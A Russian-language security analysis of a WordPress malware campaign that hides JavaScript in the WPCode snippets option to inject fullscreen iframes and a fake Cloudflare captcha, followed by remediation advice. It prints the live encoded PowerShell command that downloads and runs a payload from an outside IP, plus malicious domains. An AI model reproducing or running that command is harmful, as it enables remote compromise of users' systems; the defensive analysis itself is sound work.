Злонамеренный JavaScript вставляет полноэкранный iframe на сайты WordPress: анализ безопасности
В рамках недавних расследований безопасности выявлена стойкая вредоносная кампания на базе JavaScript, нацеленная на сайты WordPress. Этот злонамеренный скрипт вставляет полноэкранный iframe, который втайне загружает и вынуждает пользователей взаимодействовать с нежелательным контентом с подозрительных внешних доменов. Такие атаки часто служат целям, таким как мошенничество с рекламой, генерация фальшивого трафика или социальная инженерия.
Понимание угрозы: что было выявлено?
Основное вредоносное поведение связано с агрессивным внедрением полноэкранного iframe, загружаемого с сомнительных доменов. Этот iframe появляется без согласия, полностью накрывая веб-страницу, тем самым ограничивая любую легитимную пользовательскую активность.
Ключевые характеристики вредоносного ПО включают:
- Использование продвинутых методов уклонения, таких как антиотладочные процедуры, которые замедляют анализ при обнаружении отладочных инструментов.
- Перехват функций браузера, таких как методы консоли, для подавления логов и затруднения обнаружения.
- Постоянное выполнение полезной нагрузки за счёт злоупотребления localStorage для контроля частоты отображения iframe.
- Избирательное нацеливание на основе строк user-agent, преимущественно на пользователей Windows с популярными браузерами Chrome, Firefox, Edge и Opera.
Индикаторы компрометации в WordPress
Вредоносное ПО было обнаружено, встроенным в базу данных WordPress, конкретно в таблице wp_options в записи option_name=wpcode_snippets. Это расположение важно, поскольку оно соответствует плагину WPCode, часто используемому для безопасного выполнения пользовательских фрагментов кода без изменения файлов темы.
К сожалению, злоумышленники используют возможность этого плагина выполнять произвольный код, тайно внедряя вредоносные скрипты через административный интерфейс WordPress.
Задействованные вредоносные домены
Iframe загружает контент с следующих подозрительных доменов, которые были помечены и внесены в черные списки многими поставщиками безопасности:
- capcloud.icu — широко известен размещением вводящего в заблуждение контента, например, фальшивых капч.
- wallpaper-engine.pro — связан с распространением вредоносного ПО и мошеннической деятельностью.
- Дополнительные домены, связанные с тем же IP-хостингом, включают:
wanderclean.com,ampunshifu.org,cdnstat.net,adoodlz.com,secretdinosaurcult.comиweathersnoop.com.
Данные домены были подтверждены аналитическими инструментами, такими как Sucuri SiteCheck и VirusTotal, которые зафиксировали множественные обнаружения для каждого.
Глубокий анализ вредоносного ПО
Антиотладка и техники обфускации
Вредоносный скрипт запускается с помощью самовызывающейся функции, использующей различные антиотладочные техники, такие как бесконечные циклы и неправильное использование JavaScript-конструкторов. Эти приёмы предназначены для препятствия обратному проектированию путём замораживания выполнения при активных отладочных средствах.
Кроме того, скрипт переопределяет встроенные методы вывода в консоли браузера (например, console.log, console.warn), обнуляя их вывод, что эффективно скрывает подозрительную активность при инспекции.
Фильтрация User-Agent для целевых атак
Полезная нагрузка проверяет user-agent посетителя для селективного внедрения iframe на устройствах Windows, использующих популярные браузеры. Такая точность повышает успешность атаки и снижает вероятность обнаружения, избегая нецелевых платформ и ботов.
Контролируемое внедрение полноэкранного iframe
Механизм внедрения iframe предусматривает лимиты количества показов с помощью localStorage. Вредоносный iframe появляется максимум три раза и автоматически исчезает примерно через четыре минуты, симулируя безобидный пользовательский опыт и обманывая посетителей, заставляя их думать, что произошло легитимное действие (например, загрузка).
Фальшивая верификация Cloudflare и полезная нагрузка PowerShell
Одним из самых обманчивых элементов является поддельная страница Cloudflare «Подтвердите, что вы человек», подаваемая с capcloud.icu/captcha.html. Эта подделка имитирует legítимную защиту Cloudflare от DDoS, но вместо этого предлагает пользователям выполнить замаскированную команду PowerShell на их компьютерах.
Предоставленная команда использует Base64-кодирование для загрузки и тихого выполнения вредоносного скрипта, приводя к удаленной доставке полезной нагрузки и возможному компрометированию системы:
cmd.exe /c "start /min powershell -nop -ep Bypass -eC aQB3AHIAIAAiAGgAdAB0AHAAOgAvAC8AMQA4ADAALgAxADcAOAAuADEAOAA5AC4ANwAvAG0AeQBjAGEAcAB0AGMAaABhAC4AaAB0AG0AbAAiACAAfAAgAGkAZQB4AA=="
После декодирования команда загружает файл с http://180.178.189.7/mycaptcha.html, который может содержать дальнейшие вредоносные скрипты или инструкции.
Последствия и риски
Данная кампания с полноэкранным iframe несет несколько серьезных рисков:
- Влияние на опыт посетителей: Навязчивый iframe нарушает легитимное взаимодействие, подрывая доверие пользователей и репутацию сайта.
- Угрозы безопасности: Пользователей обманывают и заставляют запускать вредоносные команды PowerShell, что может привести к полному компрометированию системы.
- Репутационные и SEO потери: Затронутые сайты рискуют быть внесены в черные списки сервисов безопасности, что ухудшает позиции в поисковых системах и снижает трафик.
Лучшие практики по защите и устранению
Владельцам сайтов следует применять строгие меры безопасности для защиты и восстановления после подобных инфекций:
- Поддерживайте ядро, плагины и темы WordPress в актуальном состоянии: Регулярные обновления закрывают уязвимости, часто используемые злоумышленниками.
- Проверяйте и усиливайте использование плагинов: Отключайте или удаляйте плагины, позволяющие выполнять произвольный код, особенно те, которые дают возможность внедрения кода на уровне администратора, например WPCode snippets.
- Используйте веб-фаерволы приложений (WAF): Они способны обнаруживать и блокировать вредоносные JavaScript-инъекции и несанкционированные изменения базы данных.
- Включите мониторинг целостности файлов и базы данных: Активируйте автоматические уведомления о любых несанкционированных изменениях критичных файлов или записей базы данных.
- Реализуйте строгий контроль доступа: Используйте сложные пароли, ограничивайте количество администраторов и отключайте редактирование файлов через панель WordPress.
- Регулярно сканируйте систему на наличие вредоносного ПО: Применяйте надежные сканеры для раннего обнаружения заражений.
Заключение
Эта кампания вредоносного ПО демонстрирует, как злоумышленники эксплуатируют легитимные плагины WordPress и механизмы хранения для проведения сложных атак на основе JavaScript. Внедряя полноэкранные iframe с вредоносных доменов и обманывая посетителей поддельными страницами проверки, эта угроза ставит под угрозу безопасность сайтов и пользователей.
Соблюдение наилучших практик безопасности и использование надежных средств мониторинга остаются ключевыми для владельцев сайтов WordPress, стремящихся эффективно снижать эти риски.
Ссылки
- VirusTotal
- Sucuri SiteCheck
- Информация о плагине WPCode
- Отчет OWASP Top 10 по рискам безопасности веб-приложений — 2023

